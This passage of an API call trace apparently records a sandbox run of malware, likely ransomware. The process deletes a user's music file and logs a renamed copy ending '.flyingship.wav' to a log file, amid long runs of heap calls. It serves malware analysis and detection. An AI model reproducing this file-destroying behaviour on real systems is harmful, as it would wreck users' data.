(in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0187.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0187.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0187.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0187.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0187.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0187.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0187.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0187.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0187.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0187.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0187.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0187.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0187.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0187.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0187.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0187.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0187.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0187.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0187.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0187.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0187.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0187.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0187.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0187.608] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0187.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0187.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.608] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0187.608] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.608] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\v01oknnppjh uahh.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0187.608] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0187.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0187.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0187.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0187.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0187.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0187.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0187.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0187.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0187.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0187.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0187.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0187.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0187.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0187.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0187.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0187.609] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0187.609] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.609] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.609] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.609] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0187.610] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.610] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.610] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.614] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav", lpFilePart=0x0) returned 0x52 [0187.614] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x821d4cf0, ftCreationTime.dwHighDateTime=0x1d5db07, ftLastAccessTime.dwLowDateTime=0x981fff30, ftLastAccessTime.dwHighDateTime=0x1d5e4f2, ftLastWriteTime.dwLowDateTime=0x150c2bc0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x1e8f, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="V01OknNppjh UAhh.wav", cAlternateFileName="V01OKN~1.WAV")) returned 0x90ae18 [0187.614] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\v01oknnppjh uahh.wav")) returned 1 [0187.616] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x821d4cf0, ftCreationTime.dwHighDateTime=0x1d5db07, ftLastAccessTime.dwLowDateTime=0x981fff30, ftLastAccessTime.dwHighDateTime=0x1d5e4f2, ftLastWriteTime.dwLowDateTime=0x150c2bc0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x1e8f, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="V01OknNppjh UAhh.wav", cAlternateFileName="V01OKN~1.WAV")) returned 0 [0187.616] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0187.617] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.617] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0187.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0187.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0187.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0187.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0187.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0187.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0187.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0187.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0187.618] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0187.618] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0187.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0187.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0187.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0187.618] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0187.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.618] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0187.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0187.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0187.619] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0187.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0187.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0187.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0187.619] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0187.620] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0187.620] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.620] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0187.620] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.620] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0187.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0187.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0187.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0187.620] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0187.620] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x2845, lpOverlapped=0x0) returned 1 [0187.621] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0187.621] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x2845, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.621] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0187.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0187.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0187.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0187.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.flyingship.wav\r\n", cchWideChar=96, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 96 [0187.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0187.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.flyingship.wav\r\n", cchWideChar=96, lpMultiByteStr=0x9a5d10, cbMultiByte=96, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.flyingship.wav\r\n", lpUsedDefaultChar=0x0) returned 96 [0187.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0187.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5de0 [0187.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0187.621] WriteFile (in: hFile=0x160, lpBuffer=0x9a5de0*, nNumberOfBytesToWrite=0x5f, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5de0*, lpNumberOfBytesWritten=0x87f43c*=0x5f, lpOverlapped=0x0) returned 1 [0187.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5de0 | out: hHeap=0x8a0000) returned 1 [0187.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.622] CloseHandle (hObject=0x160) returned 1 [0187.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0187.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0187.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0187.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0187.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0187.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0187.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0187.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0187.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0187.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0187.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0187.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0187.624] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0187.624] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0187.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0187.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0187.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0187.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6d90 | out: hHeap=0x8a0000) returned 1 [0187.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0187.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0187.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0187.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0187.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0187.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0187.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0187.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0187.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0187.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0187.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0187.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0187.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0187.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0187.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0187.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0187.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0187.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0187.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0187.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0187.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0187.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0187.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0187.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0187.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0187.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0187.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0187.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0187.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0187.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0187.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0187.625] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0187.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0187.625] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0187.625] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0187.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0187.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0187.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0187.626] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0187.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0187.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0187.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0187.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1990 [0187.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0187.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0187.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0187.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0187.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 